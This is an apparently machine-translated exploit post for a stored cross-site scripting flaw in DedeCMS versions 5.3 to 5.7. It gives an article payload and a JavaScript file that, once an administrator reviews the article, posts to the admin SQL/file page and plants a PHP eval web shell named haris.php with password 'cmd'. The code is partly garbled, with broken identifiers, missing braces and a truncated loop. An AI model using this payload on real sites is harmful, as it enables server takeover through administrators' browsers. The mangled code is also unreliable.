DeDecms xss pass to kill 0day attached getshell EXP-vulnerability warning-the black bar safety net

ID MYHACK58:62201131026
Type myhack58
Reporter 佚名
Modified 2011-06-25T00:00:00


Author: haris

Vulnerability cause: due to Editor filter is not strict, will cause the malicious script to run

Currently only tested on 5. 3 to 5. 7 version. Other earlier everyone is free to play.

Here to talk about the use of the method.

Condition 3: The

  1. Open registration

  2. Open submission

  3. Admin is very hardworking, will go to the review articles, most tasteless place.

Registered member-published articles

Content fill:




background-image:url('javascript:document. write("")')


Newxss. js


var request = false;

if(window. XMLHttpRequest) {

request = new XMLHttpRequest();

if(request. overrideMimeType) {

request. overrideMimeType('text/xml');


} else if(window. ActiveXObject) {

var versions = ['Microsoft. XMLHTTP', 'MSXML. XMLHTTP', 'Microsoft. XMLHTTP', 'Msxml2. XMLHTTP. 7. 0','Msxml2. XMLHTTP. 6. 0','Msxml2. XMLHTTP. 5. 0', 'Msxml2. XMLHTTP. 4. 0', 'MSXML2. XMLHTTP. 3. 0', 'MSXML2. XMLHTTP'];

for(var i=0; i try {

request = new ActiveXObject(versions[i]);

} catch(e) {}




function getFolder( url ){

obj = url. split('/')

return obj[obj. length-2]


oUrl = top. location. href;

u = getFolder(oUrl);


function add_admin(){

var url= "/"+u+"/sys_sql_query.php";

var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris. php&str=%3C%3Fphp+eval%2 8%24_POST%5Bcmd%5D%2 9%3F%3E&B1=++%E4%BF%9D+%E5%AD%9 8++";

xmlhttp. open("POST", url, true);

xmlhttp. setRequestHeader("Content-type", "application/x-www-form-urlencoded");

xmlhttp. setRequestHeader("Content-length", params. length);

xmlhttp. setRequestHeader("Connection", "Keep-Alive");

xmlhttp. send(params);


When an administrator review this article, 将自动在data目录生成一句话haris.php the. Password cmd